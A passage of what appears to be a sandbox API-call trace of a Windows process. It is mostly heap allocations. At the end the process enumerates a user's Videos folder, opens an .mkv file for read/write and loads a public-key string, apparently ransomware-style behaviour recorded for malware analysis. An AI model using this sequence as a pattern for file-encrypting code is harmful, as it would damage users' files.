hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0245.848] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.848] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.849] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.849] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.850] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.850] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.851] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.851] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.852] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.852] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b8ccd0 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8ccd0 | out: hHeap=0x620000) returned 1 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466428 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.853] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.853] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466428 [0245.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466428 [0245.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466428 | out: hHeap=0x620000) returned 1 [0245.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\") returned="tv5aGIifkvo_ ERh\\" [0245.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c18b0 [0245.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x90) returned 0x64ec80 [0245.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\") returned="arnu9pMGj4v\\" [0245.854] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x80) returned 0x67a220 [0245.854] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x64ec80 | out: hHeap=0x620000) returned 1 [0245.854] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\") returned="NRaXHt\\" [0245.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x70) returned 0x33c41e0 [0245.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x67a220 | out: hHeap=0x620000) returned 1 [0245.855] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\") returned="2 M12KpqJt__Iy\\" [0245.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x50) returned 0x33c4ac0 [0245.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c41e0 | out: hHeap=0x620000) returned 1 [0245.855] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\") returned="Videos\\" [0245.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x40) returned 0x3b8fd60 [0245.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c4ac0 | out: hHeap=0x620000) returned 1 [0245.855] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0245.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd518 [0245.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b8fd60 | out: hHeap=0x620000) returned 1 [0245.855] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0245.855] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd518 | out: hHeap=0x620000) returned 1 [0245.855] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0245.855] PathFindFileNameW (pszPath="") returned="" [0245.855] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.855] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\*", lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd32b8b20, ftCreationTime.dwHighDateTime=0x1d5b848, ftLastAccessTime.dwLowDateTime=0xdc014260, ftLastAccessTime.dwHighDateTime=0x1d5c560, ftLastWriteTime.dwLowDateTime=0xdc014260, ftLastWriteTime.dwHighDateTime=0x1d5c560, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x33f03c8 [0245.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.857] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd32b8b20, ftCreationTime.dwHighDateTime=0x1d5b848, ftLastAccessTime.dwLowDateTime=0xdc014260, ftLastAccessTime.dwHighDateTime=0x1d5c560, ftLastWriteTime.dwLowDateTime=0xdc014260, ftLastWriteTime.dwHighDateTime=0x1d5c560, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0245.857] FindNextFileW (in: hFindFile=0x33f03c8, lpFindFileData=0x39afba4 | out: lpFindFileData=0x39afba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7aaa1770, ftCreationTime.dwHighDateTime=0x1d5c421, ftLastAccessTime.dwLowDateTime=0x4a4a59a0, ftLastAccessTime.dwHighDateTime=0x1d5c4bc, ftLastWriteTime.dwLowDateTime=0x4a4a59a0, ftLastWriteTime.dwHighDateTime=0x1d5c4bc, nFileSizeHigh=0x0, nFileSizeLow=0x7c69, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9BeflsOe8TC9OTqDHN7Q.mkv", cAlternateFileName="9BEFLS~1.MKV")) returned 1 [0245.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc0) returned 0x33a8a18 [0245.857] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x11e) returned 0x6affc0 [0245.857] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33a8a18 | out: hHeap=0x620000) returned 1 [0245.857] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\9BeflsOe8TC9OTqDHN7Q.mkv") returned=".mkv" [0245.857] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\2 M12KpqJt__Iy\\NRaXHt\\arnu9pMGj4v\\tv5aGIifkvo_ ERh\\9BeflsOe8TC9OTqDHN7Q.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\2 m12kpqjt__iy\\nraxht\\arnu9pmgj4v\\tv5agiifkvo_ erh\\9beflsoe8tc9otqdhn7q.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x644 [0245.858] GetFileSizeEx (in: hFile=0x644, lpFileSize=0x39afb40 | out: lpFileSize=0x39afb40*=31849) returned 1 [0245.858] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x39b0000 [0245.861] SetFilePointerEx (in: hFile=0x644, liDistanceToMove=0x7c43, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0245.861] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39afb78, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb78*=0x26, lpOverlapped=0x0) returned 1 [0245.863] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x30) returned 0x33c1990 [0245.863] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33c1990 | out: hHeap=0x620000) returned 1 [0245.863] SetFilePointer (in: hFile=0x644, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0245.863] ReadFile (in: hFile=0x644, lpBuffer=0x39b0000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39afb70, lpOverlapped=0x0 | out: lpBuffer=0x39b0000*, lpNumberOfBytesRead=0x39afb70*=0x7c69, lpOverlapped=0x0) returned 1 [0245.864] lstrlenA (lpString="-----BEGIN PUBLIC 